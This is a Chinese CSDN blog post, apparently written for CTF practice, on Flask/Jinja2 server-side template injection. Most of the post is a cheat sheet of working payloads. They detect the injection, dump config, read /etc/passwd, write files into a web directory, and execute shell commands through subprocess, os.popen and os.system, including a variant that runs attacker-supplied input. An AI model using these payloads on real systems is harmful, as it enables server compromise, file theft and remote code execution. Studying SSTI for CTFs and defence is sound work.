Flask Jinja2 SSTI

已于 2022-02-19 23:03:39 修改
阅读量605 收藏
点赞数
文章标签: flask python
于 2022-02-11 14:43:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51661807/article/details/122799551
版权

首先来看两个函数:

render_template和render_template_string

render_template()是渲染指定文件的

render_template('index.html')

render_template_string()是渲染一个字符串的

html = 'this is index page'

return render_template_string(html)

这种沙箱逃逸的解题思路,就是变量 -》对象 -》基类 -》子类遍历 -》全局变量,在这个流程中找到我们想用的模板函数

基本流程:使用魔术方法进行函数解析,再获取基本类,目标是寻找RCE或者文件读取。

__class__:返回一个实例所属的类

__bases__:返回类对象的基类所组成的元组(子类找父类)

__mro__:返回类组成的元组(获取MRO方法解析顺序),子类找父类

获取object对象的几种方式:

''/()/{}/[].__class__.__bases__[0]

''/()/{}/[].__class__.__mro__[1]

获取所有有用的class:

{{''/()/{}/[].__class__.__bases__[0].__subclasses__()}}

判断是否为Flask模板:

{{3*3}}

{{config.items()}}

{%debug%} //前提是开启了debug模式

获取config信息:

{{config}}

{% for key,value in config.items() %}

<dt> {{ key|e }} </dt>

<dd> {{ key|e }} </dd>

{% endfor %}

文件读取payload:

{{ ''/()/{}/[].__class__.__bases__[0].__subclasses__()[40]('/etc/passwd').read() }}

{{ config.items()[4][1].__class__.__bases__[0].__subclasses__()[40]('/etc/passwd').read() }}

#https//github.com/pallets/flask/blob/master/src/flask/helpers.py#L398

{{ get_flashed_messages.__globals__.__builtins__.open("/etc/passwd").read() }}

文件写入payload:

{{ ''/()/{}/[].__class__.__bases__[0].__subclasses__()[40]('/var/www/html/myflaskapp/1.php','w').write('hello') }}

**RCE:

{{ ().__class__.__bases__[0].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip }}

{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}

也可以通过warning来实现:

{% for x in ().__class__.__bases__.__subclasses__() %}

{% if "warning" in x.__name__ %}

{{ x()._module.__builtins__['import']('os').popen('echo 111').read()

{% endif %}

{% endfor %}

也可以把'echo 111'换成request.args.input实现动态执行(input=ls)

可以通过这种方式搜索我们想要的模板:

().__class__.__base__.__subclass__().index(file)

可以查到该模块的索引值。

贴一个大佬的脚本:

100%可以执行的globals:

xxx.__init__.__globals__

常用Payload:

python2:

读文件:

().__class__.__bases__[0].__subclasses__()[40](r'flag').read()

命令执行行:

().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__("os").popen("ls").read()')

 可以查找到索引值

python3:

().__class__.__bases__[0].__subclasses__()[-4].__init__.__globals__['system']('ls')

''.__class__.__mro__[1].__subclasses__()[104].__init__.__globals__['sys'].modules['os'].system("ls")

[].__class__.__base__.__subclasses__()[127].__init__.__globals__['system']('ls')

桃雾雨Rain
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
FlaskJinja2)--ssti(服务端模板注入漏洞)
flag_zhang的博客
03-28 359
参考文章:https://www.jianshu.com/p/a1d6ae580add 基础知识 什么是FlaskFlask 是一个使用 Python 编写的轻量级 Web 应用框架。其 WSGI 工具箱采用 Werkzeug ,模板引擎则使用 Jinja2Flask 为你提供工具,库和技术来允许你构建一个 web 应用程序。这个 web 应用程序可以是一些 web 页面、博客、wiki、基于 web 的日历应用或商业网站。 from flask import Flask app = Flask(.
Jinja2-2.10
12-21
Juinja2是Flask作者开发的一个模板系统
jinja2pp:Jinja2 ++
04-04
Jinja2 ++是用于使用变量优先级进行模板化的单文件解决方案中的一滴。 您可以使用任何语言! 怎么运行的 基于Unix管道: JSON - stdin |> stdout - JSON var_file是从STDIN提取JSON并从STD吐出JSON的任何可执行文件。 我们根据文件层次结构组装一系列级联的var_files以覆盖进行中的变量。 我们还以相同的方式进行上下文注入,即,将上下文作为每个var_file /模板的本地路径,等等 特征 可变优先级 src |── vars.perl* <- [[base variables]] ├── filters.py* <- inject ((J2 filters)) with ~vanilla python~ functions! ... ├── render_inject.rb* <- inject && overwrite
pythonjinja2
05-21
在windows下编译px4固件出错,下载此文件cd到此文件目录,然后python setup.py install即可。
Jinja2中文文档.pdf
03-15
这个是jinja2的中文文档,都是免费的,希望可以帮大家节省找文档的时间
sanic-jinja2:Jinja2对Sanic的支持
05-10
sanic-jinja2 Jinja2对Sanic的支持 安装 python3 -m pip install sanic-jinja2 特征 sanic-jinja2支持: 烧瓶状flash法 i18n和Babel支持 @jinja.template语法 支持 用于创建应用程序的工厂模式init_app方法 用法 注意: 如果要使用flash和get_flashed_messages ,则需要首先进行设置会话。 目前,app和request已挂接到jinja模板中,因此您可以直接在模板中使用它们。 并且,从版本0.3.0开始,enable_async默认为True。 如果需要同步功能,请使用jinja.render_sync,jinja.render_string_sync Python3.5不支持新的异步语法,因此0.5.0禁用异步返回,抱歉。 BUG:不应将请求设置为全
简单理解Flask Jinja2服务端模板注入(SSTI
BerL1n
09-24 671
对于表示层,Flask利用Jinga2引擎,其使用方便,自动转义.html,htm,xml以及.xhtml文件中的内容。Flask允许在Python源代码中使用HTML字符串创建模版,Flask内部使用本地线程对象,这样就可以不用为了线程安全的缘故在同一个请求中在函数之间传递对象。 服务端模版注入 Flask框架中提供的模版引擎可能会被一些无量开发者利用引入一个服务端模版注入漏洞,如果对此感到有些...
jinja2模板注入_Flask服务端模板(Jinja2)注入漏洞(SSTI)复现
weixin_39654751的博客
12-21 214
目录:1.漏洞概述2.影响范围3.漏洞等级4.漏洞复现(1)环境搭建(2)漏洞利用5.漏洞原理(1)分析payload(2)分析源码6.修复建议1.漏洞概述服务器模板注入(SSTI)是一种利用公共 Web框架的服务器端模板作为攻击媒介的攻击方式,该攻击利用了嵌入模板的用户输入方式的弱点。SSTI攻击可以利用拼接恶意用户输入导致各种漏洞。通过模板,Web应用可以把输入转换成特定的HTM...
细说Jinja2SSTI&bypass
蚁景网安学院
12-18 3171
亲爱的,关注我吧12/18本文字数10061来和我一起阅读吧前言SSTI(Server-Side Template Injection)服务端模板注入在CTF中并不是一个新颖的考点了,之...
jinja2模板注入_SSTI的服务端模版注入
weixin_36409041的博客
01-17 166
0x1 前言SSTI(服务端模版注入),或者对其还不够了解,在此之前建议去阅读一下James Kettle写的一篇 文章 问题出在开发者定义一个404错误页面,该开发者选择使用字符串格式化将URL动态添加到模版字符串中并返回到页面中,用户对模板是可控的。0x2 测试步骤定义一个错误页面。定义了一个模板字符串。使用格式化字符串的方式将URL动态添加到模版字符串中并返回在页面上。用户对模板是可控的。触...
模板注入(SSTI)攻击(jinja2)
热门推荐
钞sir的博客
10-04 2万+
和常见Web注入(SQL注入等)的成因一样,也是服务端接收了用户的输入,将其作为 Web 应用模板内容的一部分,在进行目标编译渲染的过程中,执行了用户插入的恶意内容,因而可能导致了敏感信息泄露、代码执行、GetShell 等问题。其影响范围主要取决于模版引擎的复杂性。(web安全中的真理:永远不要相信用户的输入) 以一道CTF为例,简单演示一下注入的流程及一些被过滤了的命令的构造方法; 首先打...
FlaskJinja2) 服务端模板注入漏洞(SSTI)
m0_52920608的博客
11-06 453
flask ssti
[CTF的PASSBY]浅谈FLASK-jinja2 SSTI 的绕过
qq_64201116的博客
07-04 2131
我目前了解的后端的三大语言,基于php,基于java,基于python,这篇文章就来浅浅谈谈关于python构造的flask过滤SSTI不严谨导致的SSTI注入
Flask服务端模板(Jinja2) SSTI 注入漏洞
weixin_51387754的博客
11-22 1425
漏洞简介 flask/ssti漏洞,即: FlaskJinja2) 服务端模板注入漏洞(SSTI)。Flask 是一个使用 Python 编写的轻量级 Web 应用框架,Flask 为你提供工具,库和技术来允许你构建一个 web 应用程序。这个 web 应用程序可以是一些 web 页面、博客、wiki、基于 web 的日历应用或商业网站。Jinja 2是一种面向Python的现代和设计友好的模板语言。 影响版本 使用Flask框架开发并且使用Jinja2模板引擎,最重要的是模板内容可控。满足该条件的Fla
Flask jinja2 SSTI 服务端的模板注入
qq_57172130的博客
05-03 439
Flask jinja2 SSTI 服务端的模板注入 jinja2模板引擎介绍 jinja2:是 Python 下一个被广泛应用的模板引擎,是由Python实现的模板语言,他的设计思想来源于 Django 的模板引擎,并扩展了其语法和一系列强大的功能,其是Flask内置的模板语言。 模板语言:是一种被设计来自动生成文档的简单文本格式,在模板语言中,一般都会把一些变量传给模板,替换模板的特定位置上预先定义好的占位变量名。 注入原理 环境搭建 漏洞复现 ...
基于python flask的疾病数据采集与可视化大屏,实现关联规则算法的治疗方法分析
weixin_49081159的博客
05-28 625
基于Python Flask的疾病数据采集与可视化大屏,旨在实现对疾病数据的采集、分析和可视化展示,为医疗领域提供决策支持和治疗方法分析。其中,关联规则算法被应用于治疗方法分析,旨在发现不同治疗方式之间的关联性和规律性,从而为医疗决策提供依据。通过大屏可视化展示,医疗从业者可以直观了解不同治疗方法之间的相关性,探索潜在的治疗方案组合,优化治疗流程,提高医疗效率和疗效。这项研究背景旨在结合数据采集、关联规则算法和可视化技术,为医疗决策提供更科学、数据驱动的支持,推动医疗信息化与智能化发展。
Python flask怎么连接MySQL?
最新发布
琳琳的博客
05-29 429
使用Django ORM时,你需要遵循Django的项目和应用结构,并在应用的`models.py`文件中定义模型。在Python中连接MySQL并使用模型创建新的表,通常我们会使用ORM(对象关系映射)库,比如SQLAlchemy或者Django ORM,它们允许我们定义Python类来映射到数据库中的表,并通过这些类进行数据库操作。请确保将`username`、`password`、`localhost`、`3306`和`dbname`替换为你自己的MySQL数据库的实际凭证和设置。
Flask教程5:flask数据库SQLAlchemy
Cachel Wood的博客
05-27 379
它的核心思想于在于将关系数据库表中的记录映射成为对象,以对象的形式展现,程序员可以把对数据库的操作转化为对对象的操作。,我们可能会写特别多的数据访问层的代码,从数据库保存、删除、读取对象信息,但这些代码都是重复的。当需要实现一个应用程序时,如果不使用。则能够大大减少重复性的代码。
基于python flask +pyecharts实现的气象数据可视化分析大屏
weixin_49081159的博客
05-28 518
气象数据可视化分析大屏基于Python Flask和Pyecharts技术,旨在通过图表展示气象数据的分析结果,提供直观的数据展示和分析功能。在当今信息化时代,气象数据的准确性和实时性对各行业具有重要意义。通过搭建气象数据可视化分析大屏,用户可以实时监测和分析气象数据趋势,帮助决策者制定有效的应对措施。该系统将为气象领域的研究人员、气象服务机构和相关行业提供强大的数据分析和决策支持,推动气象信息化应用的发展和提升。
python jinja2
07-13
Jinja2 是一个 Python 的模板引擎,它可以将静态模板和动态数据结合,生成最终的输出。它是 Flask 框架的默认模板引擎,也可以用于其他 Python Web 框架。 使用 Jinja2,你可以创建包含变量、表达式、控制流和过滤器等的模板文件。通过在模板中插入数据,Jinja2 可以将模板渲染成最终的输出。 下面是一个简单的使用 Jinja2 的示例: ```python from jinja2 import Template # 创建一个模板 template = Template('Hello, {{ name }}!') # 渲染模板并输出结果 output = template.render(name='John') print(output) ``` 以上代码会输出 `Hello, John!`。在模板中使用 `{{ name }}` 表达式表示一个变量,通过 `render()` 方法传递数据进行渲染。 除了变量,Jinja2 还支持条件语句、循环语句和过滤器等功能,使得模板更加灵活和强大。你可以在模板中使用控制流语句来根据条件展示不同的内容,也可以使用过滤器对数据进行处理和格式化。 希望这个简单的介绍能够帮助到你!如有更多问题,欢迎继续提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值